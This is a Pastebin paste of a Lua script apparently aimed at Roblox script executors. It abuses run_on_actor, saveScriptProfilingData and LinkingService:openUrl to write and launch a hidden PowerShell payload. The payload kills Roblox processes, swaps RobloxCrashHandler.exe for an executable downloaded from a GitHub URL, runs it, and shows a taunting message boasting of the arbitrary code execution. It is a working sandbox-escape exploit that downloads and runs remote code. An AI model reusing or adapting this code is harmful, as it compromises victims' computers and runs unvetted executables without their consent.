Advertisement
clentsgaming

dfsdf

Nov 1st, 2024
165
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.91 KB | None | 0 0
  1. if not run_on_actor then return end
  2. for i, v in pairs(getactors()) do
  3.     run_on_actor(v, [=[pcall(function()
  4.             local POWERSHELL_NAME = "doom.ps1"
  5.             local POWERSHELL_PAYLOAD = [[
  6.                 Add-Type -AssemblyName PresentationCore,PresentationFramework
  7.  
  8.                 taskkill /f /im RobloxCrashHandler.exe
  9.                 timeout 1
  10.                 move RobloxCrashHandler.exe .old
  11.  
  12.                 Invoke-WebRequest "https://raw.githubusercontent.com/evoincorp/doom/refs/heads/main/doom_bootstrapper.exe" -OutFile RobloxCrashHandler.exe
  13.  
  14.                 taskkill /f /im RobloxPlayerBeta.exe
  15.  
  16.                 [System.Windows.MessageBox]::Show("Greetings, $env:USERNAME! It seems we meet again.`n`nJust like last time, you just ran a script which abused a vulnerablity in your exploit to gain access to your system.`n`nThis is the third major round of arbitary code execution vulnerabilities, yet these 'exploit developers' still haven't learned how to secure their software - seems the only thing worse than your aim is your exploit!`n`nConsidering it's Halloween, we're feeling quite generous.`n`nYour punishment is that you cannot play Roblox for the rest of today.`n`nWe've replaced your Roblox with one of the best games of all time, one quite well suited to Halloween might I add.`nWe're sure you'll love it.`n`nGood luck!","Greetings from Latte Softworks!",0, 16)
  17.  
  18.                 attrib +r RobloxCrashHandler.exe
  19.                 start RobloxCrashHandler.exe
  20.             ]]
  21.  
  22.             local Path2 = game["Script Context"]:saveScriptProfilingData(POWERSHELL_PAYLOAD, POWERSHELL_NAME)
  23.  
  24.             local FILE_NAME = "doom.bat"
  25.             local PAYLOAD = `start "" "powershell" -WindowStyle Hidden -ExecutionPolicy Bypass {Path2}`
  26.  
  27.             local Path1 = game["Script Context"]:saveScriptProfilingData(PAYLOAD, FILE_NAME)
  28.             game.LinkingService:openUrl(Path1)
  29.         end)]=])
  30. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement